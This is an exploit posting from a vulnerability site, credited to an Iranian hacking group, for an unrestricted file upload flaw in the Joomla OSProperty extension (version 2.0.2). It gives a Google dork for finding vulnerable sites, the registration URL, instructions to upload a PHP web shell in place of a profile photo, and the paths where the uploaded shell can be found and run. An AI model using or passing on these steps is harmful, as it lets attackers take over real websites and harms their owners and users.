Joomla com property unrestricted file upload image php

2016.05.13
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/com_osproperty

########################## # Exploit Title: joomla com property unrestricted file upload image php # Dork Google : inurl:/com_osproperty # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Vendor: http://extensions.joomla.org # Version: 2.0.2 # Tested on : Linux(arch)-Windows(7ultimate) ########################### #1.Go to this route Ingrese a esta ruta http://site.com/component/osproperty/?task=agent_register ############################# #2.Complete the form, raising the shell.php instead of your photo Complete el formulario, subiendo la shell.php en lugar de su foto ############################# #3.Locate your file in the root /osproperty/agent/ Busque su archivo en la raiz /osproperty/agent/ http://site.com/images/osproperty/agent/randomid_yourshell.php ############################# #Help:This path can help you find your web shell in case you need it Este path le puede ayudar a encontrar su web shell en caso q lo necesite component/osproperty/?task=agent_default ############################ #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top